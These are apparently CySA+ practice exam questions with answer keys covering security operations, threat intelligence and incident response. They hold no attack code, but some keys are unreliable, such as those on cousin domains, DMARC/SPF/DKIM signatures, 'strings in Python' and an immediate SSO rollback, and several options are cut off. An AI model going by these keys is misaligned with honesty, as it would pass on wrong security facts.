Cysa+ Modules
A security analyst notices anomalous network activity on a system. A user's computer is communicating with a command and control (C2) server. Which of the following concepts are relevant to the security analyst's investigation into the compromised system? (Select the two best options.) A. Beaconing B. Malicious processes C. Malware installation D. Data encryption
A. Beaconing B. Malicious processes A compromised system sends a beacon signal to a C2 server to signal its availability or receive new commands. The security analyst needs to identify the specific malicious processes running on the system to determine the extent of the compromise and the actions the analyst must take to remediate the situation.
Which of the following operations is characteristic of cyber criminal activity? A. Targeting multiple pharmaceutical companies with a financial fraud scheme B. Stealing information about planned U.S. troop deployments C. Releasing embarrassing personal information about the heads of several non-governmental organizations D. Defacing the website of a prominent international oil company
A. Targeting multiple pharmaceutical companies with a financial fraud scheme Organized crime describes a category of malicious activity characterized by the desire to generate illicit profit. Frequently, the activity involves financial fraud and blackmail and normally targets companies and private citizens.
An analyst identifies a script on a compromised workstation. The analyst determines that the author has used meaningful opening and closing tags to identify data types. What scripting language is the analyst examining? A. XML B. HTML C. PowerShell D. OSINT
A. XML eXtensible Markup Language (XML) is a text-based scripting language that transfers data. An important differentiator of XML is that the language does not define the data tags; those are user-defined.
Which of the following show how system and network architecture concepts are related to security operations? (Select the three best options.) A. Zero trust B. Cloud access security broker (CASB) C. Secure access secure edge (SASE) D. Firewall rules alone
A. Zero trust B. Cloud access security broker (CASB) C. Secure access secure edge (SASE) System and network architecture concepts are vital in security operations. Zero trust emphasizes network segmentation and access control to limit access to sensitive resources, reducing the attack surface. CASB technology offers comprehensive protection for cloud-based resources by enabling visibility into cloud usage, enforcing access control policies, and providing advanced threat protection to mitigate risks associated with cloud-based services. SASE combines network security, access control, and wide area network (WAN) capabilities to secure networks and ensure authorized access to critical resources.
What is the main benefit of using software-defined networking (SDN) in a virtualized environment? A. Increased network security B. Increased ease of management C. Improved network performance D. Reduced hardware costs
B. Increased ease of management SDN allows for increased ease of management in a virtualized environment and separates the control and data planes of traditional network devices enabling the centralization and programmability of network management functions. This centralized approach to network management allows for greater control over network resources and provides a more dynamic and scalable environment.
An organization's network defense team leverages a variety of offensive techniques as defensive measures to stop active attacks while continuing to gain an understanding of adversary behavior. What type of network defense are they engaging in? A. IoCs B. Threat hunting C. Active defense D. Risk management
C. Active defense Active defense describes the adaptation of offensive techniques for network defense purposes. Honeypots are an example of active defense.
A user alerts the incident response team to an email that comes from a domain very similar to the company's legitimate domain. What appears to have been used in this attempted impersonation? A. Reverse shell B. Single pane of glass C. Webhook D. Cousin domain
D. Cousin domain A cousin domain is a domain very similar to a legitimate domain. For example, "example.trainingteam.com" is a cousin domain to "example.com."
A security analyst is writing a script to automate security operations. However, the analyst is confused about which data format to use for the script: JSON or XML. Which data format should the analyst use for the script? A. XML B. TXT C. CSV D. JSON
D. JSON JavaScript Object Notation (JSON) is the preferred data format for scripting and automation tasks in security operations. JSON is lightweight, easy to parse, and widely supported. It is commonly used for exchanging data between web applications and provides better performance and flexibility compared to XML.
The system administrator of a large organization notices abnormal account activity and a high volume of outbound traffic to a suspicious IP address from a client machine. Which of the following best describes the abnormal account activity in this scenario? A. The use of weak passwords and poor authentication mechanisms B. The use of administrator-level accounts C. A user accessing multiple resources in a short period of time D. Unusual user account behavior, such as logging in at unusual times or from unusual locations
D. Unusual user account behavior, such as logging in at unusual times or from unusual locations The abnormal activity may involve changes in login times, accessing files or systems not typically accessed, or altering security settings.
A security analyst notices that the processor consumption on the organization's server is much higher than usual. After investigating, a process named "malware.exe" was found running in the background. Which of the following best describes the relationship between processor consumption and malicious processes in this scenario? A. Malicious processes can cause high processor consumption. B. High processor consumption always indicates the presence of malicious processes. C. Low processor consumption always indicates the absence of malicious processes. D. Malicious processes have no impact on processor consumption.
A. Malicious processes can cause high processor consumption. A system infected with malware may execute malicious processes that can consume a significant amount of processing power. High processor consumption is often an indicator of malicious processes actively running on a system. Therefore, identifying and stopping such processes is crucial to preventing further damage and ensuring the security of the system.
A security organization is concerned about employees connecting rogue equipment to the network. What could they use to identify rogue devices? A. Use a map scan B. Create a honeypot C. Consult paid feeds D. Take memory dumps
A. Use a map scan A map scan, also known as a discovery scan, identifies devices connected to a network. Security organizations frequently use these scans to identify rogue devices.
Which of the following sources are potential sources of offensive open-source intelligence (OSINT)? (Select the three best options.) A. Blogs and social media B. HTML code C. Government bulletins D. Metadata
A. Blogs and social media B. HTML code D. Metadata Blogs and social media are potential sources of Open-source intelligence (OSINT). Employee blogs often contain information valuable to an attacker, including pattern of life data, contact information, or details relating to social engineering. A document's metadata may contain hidden information an organization does not intend to reveal, such as the names of its author and editors. HTML code can reveal sensitive information such as internal IP addresses, file paths, the names of sensitive servers, or software versions.
A security analyst is looking for the appropriate tools to detect and analyze malware in the organization's network. What tools allow the analyst to detect and analyze malware through virtualized environments? (Select the two best options.) A. Cuckoo Sandbox B. Joe Sandbox C. VirusTotal D. Snort
A. Cuckoo Sandbox B. Joe Sandbox Cuckoo Sandbox is a powerful open-source malware analysis system that automatically analyzes and detects malicious files and URLs in a virtualized environment. Joe Sandbox is a commercial malware analysis system that offers advanced malware analysis capabilities such as code analysis, behavior analysis, and memory analysis in a virtualized environment.
Which of the following logging levels is the highest and most verbose level of logging in Windows Event Viewer? A. Debug B. Warning C. Information D. Error
A. Debug Debug is the highest level of logging in Windows Event Viewer, providing the most verbose output for troubleshooting purposes by providing detailed information about a software application or system process.
A threat hunter is searching for malicious activity on a corporate network. Which of the following might they use to guide their efforts? (Select the two best options.) A. Log files B. Memory dumps C. IoCs D. IoAs
C. IoCs D. IoAs Indicators of compromise (IoCs) suggest a compromise may have occurred, such as communications with a malicious domain or IP, suspicious network traffic, or unusual privileged account activity. Identification of an IoC warrants additional investigation. Indicators of attack (IoAs) identify an ongoing attack. These sometimes include specific network traffic, user account creation, and particular log activity.
An analyst at a financial services company is conducting a review of several threat intelligence providers. If the analyst wants to ensure they can filter reports by industry, they are likely concerned about what attribute of threat intelligence? A. Timeliness B. Accuracy C. Open source D. Relevancy
D. Relevancy Relevancy refers to the usefulness of a piece of information concerning a specific threat. Relevant information is actionable and gives an organization meaningful context. Filtering information by the appropriate industry increases its relevancy.
A company is implementing a new authentication system that uses passwordless and SSO capabilities. During the rollout, the IT team notices some employees are having trouble accessing certain applications and resources, while others are experiencing no issues. Upon investigation, the team discovers that some applications and resources are not compatible with the new system. What is the best course of action for the IT team to take in response to this issue? A. Immediately roll back the passwordless and SSO authentication system and revert to the previous system B. Contact the vendors of the incompatible applications and resources to see if they have updates that will make them compatible with the new system C. Notify all employees to use their previous login credentials until the incompatible applications and resources are updated D. Ignore the issue and allow some employees to be unable to access certain applica
A. Immediately roll back the passwordless and SSO authentication system and revert to the previous system Immediately rolling back the passwordless and SSO authentication system and reverting to the previous system is the best option because it will restore the system to the previous state in which all employees could access all applications and resources.
A security analyst monitoring a network for any irregularities notices a significant increase in beaconing and irregular peer-to-peer communication on one of the company's servers. Which of the following best describes the potential threat of this situation? A. Malware propagation and system compromise B. Data exfiltration and infiltration C. Phishing and spear-phishing attacks D. Privilege escalation and credential theft
A. Malware propagation and system compromise Beaconing is an irregular communication pattern in which a device sends repeated signals or messages to a command and control (C&C) server to establish a connection. Irregular peer-to-peer communication is the communication between two devices that are not typically in direct contact with each other, and it can indicate a lateral movement of malware between endpoints.
After discovering malicious activity on a network, what artifacts might a threat hunter analyze to identify additional indicators of compromise (IoCs)? (Select the three best options.) A. Memory dumps B. Network traffic C. Paid feeds D. Log files
A. Memory dumps B. Network traffic D. Log files Log files are records of events on a given system. Threat hunters develop indicators of compromise (IoCs) based on specific events found in the logs. Memory dumps are records of the information contained in RAM. They can provide valuable information about running processes that may not be available anywhere else. Network traffic is the information transiting a network. Monitoring it for specifically formatted information can help identify malicious activity.
Which of the following is a common method for protecting cardholder data and PII? A. Default system configurations B. Encryption technology C. Single-factor authentication D. Data retention policies
B. Encryption technology Encryption technology protects sensitive information such as cardholder data and personally identifiable information (PII). It is crucial to implement appropriate security measures to safeguard sensitive information through data encryption, access control, and security awareness training for employees.
Which of the following is a potential security risk associated with implementing a single sign-on (SSO) solution in a security operations environment? A. Increased complexity of authentication process B. Increased risk of phishing attacks C. Incompatibility with multi-factor authentication (MFA) D. Greater reliance on physical devices for authentication
B. Increased risk of phishing attacks SSO can be convenient for users and help improve productivity, but it can also make it easier for attackers to gain access to multiple systems or applications if they can successfully steal or phish a single set of login credentials.
An analyst is reviewing logs and notices unusual traffic spikes and activity on unexpected ports. Further investigation reveals that the traffic originates from a group of servers on the network. What is the best course of action for the analyst to take in response? A. Ignore the unusual activity as it may be a false positive or a normal activity B. Isolate the affected servers from the network to prevent further malicious activity and initiate incident response procedures C. Shutdown the affected servers and restore them from the most recent backup D. Deploy additional network monitoring tools to investigate the source of the traffic
B. Isolate the affected servers from the network to prevent further malicious activity and initiate incident response procedures To prevent the further spread of the attack and minimize the impact of the incident, the analyst should disconnect the affected servers from the network and initiate incident response procedures.
A security analyst for a corporation notices abnormal OS process behavior and unauthorized changes in the network environment. The analyst reviews the logs and identifies suspicious activities on a server. The analyst could have implemented which security operations practice to prevent the incident from happening in the first place? A. Incident response procedures to quickly detect and respond to security incidents B. Regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them C. User access control policies to limit access to sensitive systems and data D. Regular system backups to quickly restore systems and data in the event of a compromise
B. Regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them The analyst should conduct regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them. When the analyst can identify and remediate vulnerabilities, attackers will have more difficulty exploiting systems and software.
A company's security operations center has implemented a data loss prevention (DLP) solution to monitor and prevent sensitive data from being transmitted outside the organization. The security team also maintains strict controls over cardholder data (CHD) and personally identifiable information (PII) to comply with industry regulations and protect customer privacy. Which of the following is a potential benefit of implementing a DLP solution in a security operations environment? A. A DLP solution can provide physical security for servers and network devices, protecting against theft or damage. B. A DLP solution can automatically detect and remediate vulnerabilities in software and hardware components. C. A DLP solution can help prevent sensitive data from being transmitted outside the organization, reducing the risk of data breaches and compliance violations. D. A DLP solution can provide real-time threat intel
C. A DLP solution can help prevent sensitive data from being transmitted outside the organization, reducing the risk of data breaches and compliance violations. DLP can help identify and prevent unauthorized access, transmission, and storage of sensitive data such as cardholder data and personally identifiable information.
A security analyst analyzes application logs to identify any suspicious activities and notices that one of the company's recently resigned employees had downloaded a large amount of data just before leaving. What is the analyst's most appropriate next step based on the scenario? A. Block the former employee's access to the company's server to prevent further data exfiltration B. Notify the authorities and report the incident to prevent further data theft C. Check the company's firewall logs to identify any external connections made by the former employee D. Review the network's DNS logs to identify any unusual connections to external domains
C. Check the company's firewall logs to identify any external connections made by the former employee Checking the company's firewall logs will help the analyst identify any external connections made by the former employee, which can indicate whether the former employee has shared company data with external parties.
A threat hunter is searching for malicious activity with information derived from the research of a third-party commercial entity. What kind of information is the threat hunter likely using? A. Internal sources B. OSINT C. Paid feed D. ISACs
C. Paid feed A paid feed, also referred to as a commercial feed, is a source of cyber threat intelligence developed using the research and analysis of a private commercial entity.
A security analyst is developing a Python script to analyze regular text from log files. The script will identify potential security incidents and generate alerts for further investigation. Which of the following best describes the security concept the analyst needs to implement in the Python script to detect obfuscated text? (Select the two best options.) A. Polymorphic code B. Cryptography C. Regular expression D. String manipulation
C. Regular expression D. String manipulation The user can utilize regular expressions to detect patterns in text, which can help identify potential security incidents. The user can utilize string manipulation to modify strings, which is helpful in analyzing obfuscated text.
A cybersecurity analyst is investigating a potential phishing attack against one of their clients and finds an email with an attachment and a long string of characters the analyst does not recognize. What is this long string of characters? A. A public key B. A private key C. An encrypted password D. A hash value
D. A hash value Hashing is the process of transforming data into a unique fixed-length string of characters representing the original data to ensure any change to the original data will result in a different hash value, thereby verifying the integrity of the data.
Which of the following provides cybersecurity information and services to the owners and operators of critical infrastructure? A. OSINT B. CSIRT C. Threat hunting D. ISACs
D. ISACs Information Sharing and Analysis Centers (ISACs) provide cybersecurity information and services to the owners and operators of critical infrastructure. They are a forum for exchanging information between the public and private sectors to ensure the protection of vital assets.
A security analyst responsible for carrying out security operations on a company's network has received reports of certain users experiencing issues with their device's slow performance and high memory consumption. Which of the options is a probable cause of the high memory usage and slow performance? A. Running multiple applications at the same time B. Running outdated operating system software C. Having insufficient disk space on the device D. Installing software from unverified sources
D. Installing software from unverified sources Installing software from unverified sources can introduce malware or other harmful programs that consume significant system resources, leading to users experiencing issues with their device's slow performance and high memory consumption.
A company has recently upgraded to the latest version of the web application. During a review of the logs, the security analyst notices an unauthorized change made to the web application by an unknown user. Which of the following logs would most likely provide information about the unauthorized change? A. System log B. Event log C. Application log D. Security log
C. Application log The application log provides information about the application's internal functions and operations, including any unauthorized changes.
What do serverless, cloud, hybrid, and on-premises environments all use in security operations? (Select the three best options.) A. Access control mechanisms B. Security frameworks C. Incident response procedures D. Reduced attack surface
A. Access control mechanisms B. Security frameworks C. Incident response procedures Serverless, cloud, hybrid, and on-premises environments all need access control mechanisms to restrict unauthorized access to any sensitive data or systems. Security frameworks will provide a structured approach to security risk management. Developing incident response procedures is crucial for effectively managing security incidents to minimize damages and potential risks.
A security analyst for a large financial institution notices abnormal OS process behavior, unauthorized changes, and file system changes occurring on one of the company's servers. The analyst believes there may be a security breach. What is the best way to confirm the analyst's suspicions of a breach? A. Check the system logs for unusual activity B. Conduct a full system backup to ensure that data is not lost C. Ask all employees who have access to the server if they made any changes D. Shut down the server immediately to prevent further damage
A. Check the system logs for unusual activity System logs record all activity on a server, including processes and file changes, which makes it an excellent resource for detecting security breaches.
A security analyst notices abnormal account activity in the company's system. Someone accessed the system with the CEO's credentials at 2:00 am from a location 500 miles away from the CEO's usual location. The analyst tracks the IP address, GPS address, and device that accessed the system. Which security operation technique did the analyst use to determine the location and device of the user who accessed the system? A. Digital forensics B. Log analysis C. Alert triage D. Threat hunting
A. Digital forensics The security analyst tracked the GPS address, IP address, and device the attacker used to determine their location, which is an example of using digital forensics to investigate the incident.
The Department of Homeland Security announces a binding operational directive for federal agencies. This is an example of what? A. Government bulletins B. CERT C. MITRE ATT&CK D. Metadata
A. Government bulletins Government bulletins contain information and advice related to defending against cyber threats. A binding operation directive is a government bulletin that contains guidance federal agencies must implement.
What are the advantages of implementing single sign-on (SSO) technology for an organization's authentication process? (Select the two best options.) A. Improving user experience by reducing the need for multiple logins and passwords B. Enabling passwordless authentication through the use of smart cards or mobile devices C. Eliminating the need for multi-factor authentication (MFA) D. Providing an additional layer of security through the use of biometric authentication
A. Improving user experience by reducing the need for multiple logins and passwords B. Enabling passwordless authentication through the use of smart cards or mobile devices Single sign-on (SSO) technology enhances security and simplifies access management by allowing users to authenticate to multiple applications or systems with a single set of credentials, thereby reducing the need for multiple logins and passwords. Passwordless authentication via SSO further improves security by using more secure methods like smart cards or mobile devices.
A company realizes that an attacker has persistent access to several internal servers. What team is best prepared to react to this? A. Threat hunters B. Hacktivists C. CSIRT D. General council
C. CSIRT Computer security incident response team (CSIRT) is a group of security professionals with a wide variety of specialties who respond to security incidents quickly and effectively.
An organization considers increasing threat intelligence sharing. Which parts of the organization are likely to experience direct benefits from this increased intelligence sharing? (Select the three best options.) A. Incident response B. The general council C. Risk management D. Security engineering
A. Incident response C. Risk management D. Security engineering Incident responders can benefit from the sharing of tactics, techniques, and procedures (TTPs) and can learn valuable lessons from the experiences of other incident response teams. Risk management is a program designed to identify risks and develop strategies to minimize their impact on an organization. Threat intelligence helps organizations make more informed risk decisions. Security engineers can adapt their security solutions to new and innovative TTPs used by malicious actors, increasing their effectiveness against the types of techniques attackers use.
A security analyst at a large financial institution monitors network traffic for any unusual activity. The analyst notices an unusual spike in network traffic occurring on an unexpected port, indicating possible malicious activity. Which of the following actions should the analyst take in response to this anomalous activity? (Select the two best options.) A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity C. Immediately block traffic on the unexpected port D. Monitor the activity for a longer period to confirm that it is not simply a temporary anomaly
A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity Investigating the traffic to determine its source and destination is essential to understanding the nature of the anomalous activity. Alerting the manager and other relevant parties about anomalous activity is critical in ensuring a swift and coordinated response to any potential security threats.
While monitoring the network traffic of a large financial institution, a security analyst notices an unusual pattern of outgoing traffic occurring on an unexpected port. Which of the following actions should the analyst take in response to this anomalous activity? (Select the two best options.) A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity C. Immediately block traffic on the unexpected port D. Monitor the activity for a longer period to confirm that it is not simply a temporary anomaly
A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity Investigating the traffic to determine its source and destination is essential to understanding the nature of the anomalous activity. Alerting the manager and other relevant parties about anomalous activity is critical in ensuring a swift and coordinated response to any potential security threats.
During a digital forensic analysis, an analyst may generate what kinds of useful information? (Select the three best options.) A. IoCs B. Vulnerabilities C. Misconfigurations D. OSINT
A. IoCs B. Vulnerabilities C. Misconfigurations Indicators of Compromise (IoCs) are items that suggest a compromise may have occurred. These can include communications with a malicious domain or IP, suspicious network traffic, or unusual privileged account activity. Identification of an IoC warrants additional investigation. Vulnerabilities are flaws in a system, software, or device that weaken security and present an opportunity for exploitation. Misconfigurations are deviations from required configuration standards. Misconfigurations create an opportunity for exploitation.
A security analyst at a large financial institution has recently noticed an increase in unexpected outbound communication and is concerned about potential data exfiltration. Which of the following actions should the analyst take to address this? (Select the three best options.) A. Monitor network traffic for any suspicious outbound connections B. Implement network segmentation to prevent lateral movement by attackers C. Check for any malware or malicious software on the organization's systems D. Block all outbound traffic from the organization's network to mitigate data loss during the investigation
A. Monitor network traffic for any suspicious outbound connections B. Implement network segmentation to prevent lateral movement by attackers C. Check for any malware or malicious software on the organization's systems Monitoring network traffic is essential in detecting suspicious outbound connections because the analyst can identify any unusual outbound traffic patterns and investigate further. Implementing network segmentation can prevent lateral movement by attackers and limit their ability to access sensitive data. Checking for malware or malicious software on the organization's systems is also crucial in identifying any malicious activity causing unexpected outbound communication.
A project manager needs to verify users and authorize access to systems and applications. Which security control should the project manager implement? A. Multi-factor authentication B. Firewall C. Access control list D. Password manager
A. Multi-factor authentication Implementing multi-factor authentication (MFA) is the most appropriate security control to ensure user authentication and authorization for accessing required systems and applications. MFA uses multiple authentication methods such as passwords, biometrics, or token-based authentication to enable only authorized users to access the systems and applications.
A network engineer is gathering requirements from a security operations center (SOC) analyst. Which of the following requirements might lead the engineer to suggest deploying a honeypot? (Select the two best options.) A. Network defenders need the ability to observe attacks on the network. B. The organization needs to regularly develop new indicators of compromise (IoCs) and indicators of attack (IoAs) based on the attacks they are experiencing. C. The organization needs to minimize human interaction through orchestration. D. Analysts need the ability to code in XML.
A. Network defenders need the ability to observe attacks on the network. B. The organization needs to regularly develop new indicators of compromise (IoCs) and indicators of attack (IoAs) based on the attacks they are experiencing. A honeypot is a fake file, host, or network designed to lure an attacker away from legitimate network assets and information. An organization can steer an attacker toward these fake resources to watch how they operate without exposing valuable resources. Indicators of compromise (IoCs) are items that suggest a compromise may have occurred. Indicators of attack (IoAs) are items that can identify an ongoing attack.
A security researcher identifies a financial fraud scheme targeting multiple pharmaceutical companies. What type of actor is most likely responsible for this activity? A. Organized crime B. Nation state C. Hacktivists D. Script kiddie
A. Organized crime Organized crime refers to malicious activity characterized by the generation of illicit profit. Frequently, this activity involves financial fraud and blackmail.
A large financial institution is considering passwordless authentication and SSO as part of a new incident response and management plan to improve security and streamline operations. Which of the following is true about passwordless authentication and SSO in incident response and management? A. Passwordless authentication and SSO can help reduce incident response and management time. B. Passwordless authentication and SSO are not suitable for incident response and management as they create additional security risks and complexities. C. Passwordless authentication and SSO are only useful for small organizations with limited security needs. D. Passwordless authentication and SSO can only be used for incident response and management in large organizations.
A. Passwordless authentication and SSO can help reduce incident response and management time. Passwordless and single sign-on (SSO) are two authentication technologies frequently used in incident response and management. These technologies involve the handling of cybersecurity incidents in a systematic manner and include detection, analysis, containment, eradication, and recovery.
Which of the following concepts related to security operations involves the use of digital certificates to establish trust between entities and secure communication channels? A. Public key infrastructure (PKI) B. Single sign-on (SSO) C. Intrusion detection system (IDS) D. Firewall
A. Public key infrastructure (PKI) PKI is a framework that enables secure communication by using digital certificates to authenticate and establish trust between entities. Secure Sockets Layer (SSL) is a protocol that uses PKI to secure communication channels such as web traffic.
What are the benefits of network segmentation in security operations, specifically in relation to system and network architecture concepts and operating system (OS) concepts? (Select the two best options.) A. Reducing the attack surface by limiting access to sensitive resources B. Allowing for more effective monitoring of network traffic and detection of anomalous activity C. Increasing network performance by reducing network congestion D. Enabling easier access to resources across different network segments
A. Reducing the attack surface by limiting access to sensitive resources B. Allowing for more effective monitoring of network traffic and detection of anomalous activity Network segmentation is a security practice that divides a network into smaller, isolated segments, reducing the attack surface by limiting access to sensitive resources. Network segmentation enables more effective monitoring of network traffic and detection of anomalous activity, making it easier for security teams to identify and respond to potential threats.
A security analyst discovers that unauthorized privileges have been granted to a new account that was created with high-level access, which was not authorized by the security team. Which of the following is the most effective way to prevent the introduction of new accounts with unauthorized privileges in an organization's environment? A. Regularly review and audit user accounts to identify and disable any unused or unneeded accounts B. Use strong passwords and enforce password policies to prevent unauthorized access to user accounts C. Block access to the organization's network from external sources to prevent attacks and data breaches D. Implement a firewall to monitor all incoming and outgoing network traffic to identify suspicious activity
A. Regularly review and audit user accounts to identify and disable any unused or unneeded accounts Regularly reviewing and auditing user accounts identifies accounts that should be disabled, have been compromised, and have been granted unauthorized access privileges to the organization's systems.
A cybersecurity analyst has noticed an increase in suspicious activity on the network. They consider implementing a security information and event management (SIEM) solution and endpoint detection and response (EDR) solution to help identify and respond to potential threats. What is a potential benefit of implementing both a SIEM and EDR solution in a security operations environment? A. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats. B. SIEM can provide in-depth analysis of endpoint activity, while EDR can identify and prevent malicious network traffic from entering the network. C. SIEM can identify and prevent malware from infecting endpoints, while EDR can monitor and report on network activity to identify potential threats. D. SIEM can prevent unauthori
A. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats.
An analyst needs to use Nmap to identify workstations with a specific service running on port 8080. What type of script would be best for automating this task? A. Shell script B. XML C. APT D. CSIRT
A. Shell script Shell scripts are best for automating complicated tasks. They easily automate software updates, assist with log review, and run Nmap scans.
A cybersecurity specialist is checking a link to a news article within a colleague's email. The email appears to be genuine, but the link is deliberately obscured. The specialist suspects that the link may be part of a social engineering attack that aims to exploit the organization's security vulnerabilities. What is the role of obfuscated links in social engineering attacks and their impact on IT security operations? (Select the three best options.) A. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. B. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. C. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. D. Obfuscated links a
A. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. B. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. C. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. Social engineering attacks rely on the exploitation of human vulnerabilities, such as trust and curiosity, to gain unauthorized access to sensitive information or networks. Attackers often use obfuscated links in phishing attacks using social engineering to trick users into clicking on a link that leads to a fake website designed to steal personal information. Attackers often use obfuscated links in social engineering attacks to redirect users to malicious websites that can infect their devices with malware or steal login credentials.
A security analyst for a large financial institution investigates a suspicious IP address that their security system flagged. The analyst finds two useful resources, WHOIS and AbuseIPDB. Which of the following best describes the role of WHOIS and AbuseIPDB in security operations? A. WHOIS and AbuseIPDB identify the source of suspicious network traffic. B. WHOIS and AbuseIPDB block malicious traffic from entering a network. C. WHOIS and AbuseIPDB encrypt sensitive data to prevent unauthorized access. D. WHOIS and AbuseIPDB monitor the network for potential vulnerabilities.
A. WHOIS and AbuseIPDB identify the source of suspicious network traffic. WHOIS is a publicly available database that provides information about the owners of registered domain names, IP addresses, and autonomous system numbers. AbuseIPDB is a community-driven project that collects and shares data about IP addresses reported for abusive behavior.
A security analyst is investigating a potential security breach in the company's network. The analyst is using Wireshark and tcpdump to analyze the network traffic and detect any suspicious activity. Which tool can be used to view the network packets in real time and analyze them using a graphical user interface, while the other tool captures network packets and displays them in a text-based format? A. Wireshark is a graphical user interface tool, while tcpdump is a command-line tool. B. Wireshark and tcpdump are both command-line tools the analyst can use for network analysis. C. Wireshark and tcpdump are both graphical user interface tools the analyst can use for network analysis. D. Tcpdump is a graphical user interface tool, while Wireshark is a command-line tool.
A. Wireshark is a graphical user interface tool, while tcpdump is a command-line tool. The analyst can utilize Wireshark, a graphical user interface tool, to view network packets in real time and analyze them in a user-friendly way.
Which of the following is an example of cardholder data (CHD)? A. A customer's name and email address B. A customer's credit card number and expiration date C. A customer's social security number D. A customer's mother's maiden name
B. A customer's credit card number and expiration date Personally identifiable information (PII) related to credit cards or payment cards is cardholder data. It includes sensitive information such as card numbers, expiration dates, and security codes. It is important to ensure that any system that handles cardholder data is secure to prevent data breaches and protect the privacy of customers.
Network defenders realize they are learning valuable information about attackers each time a host is compromised. They want to preserve the ability to gain these insights without risking sensitive information. What tool or technique could the network defenders implement to accomplish this goal? A. Threat hunting B. A honeypot C. A SIEM D. Paid threat feeds
B. A honeypot A honeypot is a fake file, host, or network designed to lure an attacker away from legitimate network assets and information. An organization can steer an attacker toward these fake resources to watch how they operate without exposing valuable resources.
While reviewing alerts, an analyst notices a new signature is generating a high volume of false positives. This appears to be the result of an error in the way the signature is written. This represents an issue with what attribute of threat intelligence? A. Relevancy B. Accuracy C. Timeliness D. Reconnaissance
B. Accuracy Accuracy describes the correctness of threat intelligence. Accurate information is free of errors and biases.
A security analyst at a large financial institution monitors the network for any suspicious activity and finds a log file that appears to have been tampered with. Using the strings command in Python, what will the analyst be able to extract? A. Only strings that are visible to the user B. Both strings and binary data C. Only binary data D. Only numerical data
B. Both strings and binary data The strings command in Python extracts human-readable strings from binary data to obtain text from executable files and extracts data from log files.
A threat-hunting team is looking for unusual traffic and anomalous attempts to access the company's essential servers, databases, and applications. This is an example of what focus area? A. Misconfiguration hunting B. Business-critical asset hunting C. Isolated network hunting D. Indicators of compromise hunting
B. Business-critical asset hunting Business-critical asset hunting is when an organization identifies its business-critical systems and conducts a threat hunt designed to uncover unusual traffic and anomalous attempts to access those systems.
Which of the following might help a company coordinate the response to a cyberterrorist attack? (Select the two best options.) A. MITRE ATT&CK B. CERT C. OSINT D. CSIRT
B. CERT D. CSIRT Computer security incident response team (CERT) is a group tasked with mitigating and minimizing the impact of malicious activity. They coordinate across multiple organizations to ensure an effective response to major incidents. Computer security incident response team (CSIRT) is a group of security professionals with a wide variety of specialties who respond to security incidents quickly and effectively.
Which statement best explains the importance of cloud system and network architecture concepts in security operations as they relate to hybrid and on-premises systems? A. Cloud system and network architecture concepts are only useful for securing cloud-based systems. B. Cloud system and network architecture concepts are essential for securing both hybrid and on-premises systems. C. Cloud system and network architecture concepts are important for securing on-premises systems, not hybrid systems. D. Cloud system and network architecture concepts are not important for securing hybrid or on-premises systems.
B. Cloud system and network architecture concepts are essential for securing both hybrid and on-premises systems. Knowledge of cloud system and network architecture concepts is essential for securing both hybrid and on-premises systems.
A security analyst discovers that an attacker is attempting to launch a distributed denial-of-service (DDoS) attack on the company's network. What action should the security analyst take to prevent the DDoS attack from succeeding? A. Implement a firewall to block traffic from the attacker's IP address B. Configure the router to limit the amount of traffic coming from the attacker's IP address C. Add more bandwidth to the server to handle the increased traffic D. Shut down the server until the attacker is identified
B. Configure the router to limit the amount of traffic coming from the attacker's IP address The security analyst should configure the router to limit the amount of traffic coming from the attacker's IP address. This will prevent the attacker from overwhelming the company's server with traffic.
The IT team at a company wants to implement additional security measures to prevent recent phishing attempts against their employees. The team will use Domain-based Message Authentication, Reporting and Conformance (DMARC), Sender Policy Framework (SPF), and DomainKeys Identified Mail (DKIM) to secure the email system. Which of the following statements is true regarding DMARC, SPF, and DKIM in the context of email security operations A. DMARC, SPF, and DKIM are all email security protocols that use encryption to protect emails from phishing attempts. B. DMARC, SPF, and DKIM are all email security protocols that use digital signatures to authenticate emails and prevent spoofing. C. DMARC, SPF, and DKIM are all email security protocols that use machine learning to detect and block spam emails. D. DMARC, SPF, and DKIM are all email security protocols that use firewalls to prevent unauthorized access to emails.
B. DMARC, SPF, and DKIM are all email security protocols that use digital signatures to authenticate emails and prevent spoofing. Domain-based Message Authentication, Reporting, and Conformance (DMARC) validates the authenticity of the sender's domain, while Sender Policy Framework (SPF) verifies that the message comes from an authorized IP address. DomainKeys Identified Mail (DKIM) adds a digital signature to the email to verify its integrity. Together, they help prevent phishing attacks and ensure the safety and security of email communication.
A cybersecurity analyst develops a new security protocol that utilizes hashing and headers to enhance the security of the company's data transmissions. Which of the following correctly explains the role of hashing and headers in enhancing security operations? A. Hashing and headers encrypt data transmissions. B. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. C. Hashing and headers decrypt data transmissions. D. Hashing and headers are not related to enhancing security operations; they only format and organize data.
B. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. Hashing generates a unique digital representation of fixed-length and irreversible data. Headers are pieces of metadata added to a message or data packet that include information such as sender and recipient information, data type, and various other parameters that help to route and manage the transmission of data.
During a log review, an incident responder discovers that a network administrator sent a sensitive file containing company financial data to their personal email account on the same day they resigned. This is likely an example of what? A. Unintentional insider B. Intentional insider C. Script kiddie D. OSINT collection
B. Intentional insider An intentional insider is a trusted individual who knowingly and intentionally conducts or facilitates malicious activity against an organization.
